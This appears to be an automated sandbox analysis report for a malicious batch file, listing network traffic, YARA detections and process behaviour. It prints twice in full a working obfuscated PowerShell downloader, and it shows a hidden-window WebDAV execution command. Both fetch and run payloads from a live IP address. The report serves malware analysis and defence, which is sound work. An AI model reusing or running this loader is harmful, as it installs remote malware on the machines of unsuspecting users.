Data received	HTTP/1.1 200 OK Content-Length: 154 Last-Modified: Fri, 13 Oct 2023 13:17:27 GMT Content-Type: text/plain Date: Tue, 17 Oct 2023 01:04:18 GMT ETag: "5720f861963a7d5332b9171ecdc663c0-1697203047-154" Accept-Ranges: bytes Server: WsgiDAV/4.2.0 Cheroot/9.0.0 Python 3.11.1
Data received	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -Command \\91.207.183.9@8000\DavWWWRoot\main.exe

Poweshell is sending data to a remote host (4 events)

Data sent	GET /artwork.hta HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive
Data sent	soe-Ýyþ4ííiÄÅVûÙçÖ$ä\\|çcYNæÑ÷/5 ÀÀÀ À 28.ÿwww2.lunapic.com
Data sent	soe-Ýz¼ãbÈÝ×ë^TâGàtíì¼`d/5 ÀÀÀ À 28.ÿwww2.lunapic.com
Data sent	GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Oct. 17, 2023, 10:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 17, 2023, 10:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Oct. 17, 2023, 10:03 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://91.207.183.9:8000/artwork.hta

Yara rule detected in process memory (50 out of 62 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

powershell.exe -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;

Communicates with host for which no DNS query was performed (1 event)

host

91.207.183.9

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Roaming\main.bat

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (4 events)

Time & API	Arguments	Status	Return
send Oct. 17, 2023, 10:03 a.m.	buffer: GET /artwork.hta HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive socket: 1424 sent: 78	1	78
send Oct. 17, 2023, 10:03 a.m.	buffer: soe-Ýyþ4ííiÄÅVûÙçÖ$ä\\|çcYNæÑ÷/5 ÀÀÀ À 28.ÿwww2.lunapic.com socket: 1440 sent: 120	1	120
send Oct. 17, 2023, 10:03 a.m.	buffer: soe-Ýz¼ãbÈÝ×ë^TâGàtíì¼`d/5 ÀÀÀ À 28.ÿwww2.lunapic.com socket: 1440 sent: 120	1	120
send Oct. 17, 2023, 10:03 a.m.	buffer: GET /main.bat HTTP/1.1 Host: 91.207.183.9:8000 Connection: Keep-Alive socket: 1140 sent: 75	1	75

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Users\test22\AppData\Roaming\main.bat"
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Roaming\main.bat

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://91.207.183.9:8000/artwork.hta

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2148 resumed a thread in remote process 2384
NtResumeThread Oct. 17, 2023, 10:03 a.m.	thread_handle: 0x00000084 suspend_count: 0 process_identifier: 2384	1	0	0

Creates a suspicious Powershell process (5 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy unrestricted	value	Attempts to bypass execution policy
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

555.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All